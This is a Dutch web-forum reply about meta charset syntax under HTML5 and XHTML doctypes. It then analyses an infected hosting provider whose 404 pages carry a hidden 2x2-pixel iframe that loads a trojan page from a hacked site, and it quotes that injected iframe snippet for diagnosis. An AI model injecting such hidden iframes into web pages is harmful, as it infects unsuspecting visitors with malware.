"Het charset attribuut bestaat niet onder het XHTML doctype. Als je dat attribuut wilt gebruiken moet je het HTML5 doctype gebruiken." (Naarling).
Voor alle duidelijkheid nog even:
Dat klopt, als je een
html5-doctype hebt,
<!DOCTYPE HTML>, dan moet je in een <meta> het charset-attribuut gebruiken:
HTML:
...
<meta charset="utf-8" />
Maar als je een
XHTML-doctype gebruikt, zoals
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ... enz.>, dan moet er geen charset-
attribuut (= eigenschap:
charset="...") in de <meta> staan, maar moet de charset op een andere manier in de <meta> worden opgenomen.
Zoals jaco al aangaf:
HTML:
...
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
=======
Toch virus!
De virusmelding is een eigenaardige.
Uit het
screenshot van ROYONIX kan je bij vergroting zien (rechtsonder), dat het gaat om het
favicon.ico, dat een Trojaans Paard zou bevatten.
- Maar (1) ... in de paginacode staat [intussen] helemaal geen link naar dat favicon!
- Maar (2) ... vraag je de favicon.ico rechtstreeks op (NB: Niet doen! *), dan bestaat die niet eens op de opgegeven plaats.

- Maar (3) ... wat er dan gebeurt, is dat de server een "404 - Page Not Found" bericht teruggeeft.
En nu komt het!
Bekijk je de broncode van dat 404-bericht, dan staat daar onderaan een onzichtbaar <iframe> van 2x2 pixels ingefrommeld:
HTML:
...
<iframe name=Twitter scrolling=auto frameborder=no align=center
height=2 width=2 src=http:// ... .org/hrpu.html?i=2033637>
</iframe>
De
... .org is een groot makelaarskantoor in de buurt van New York, en zal niet in Trojaanse Paarden handelen.
Vermoedelijk zal hun site gehackt zijn, en is er die pagina
hrpu.html op gezet, waar het virus in zit.
- NB: Dit kantoor zal zelf niets in de gaten hebben, want hun eigen site bevat niet dat <iframe> naar die pagina!
Conclusie:
Mijn conclusie is, dat de server van je provider gehackt is, en dat alle (automatische) 404-pagina's voorzien zijn van de besmetting.
Ik zou dan ook snel contact opnemen met je provider (AXC, als ik het goed heb), hun vertellen dat hun 404-pagina's besmet zijn, en vragen dat z.s.m. in orde te maken!
Met vriendelijke groet,
CSShunter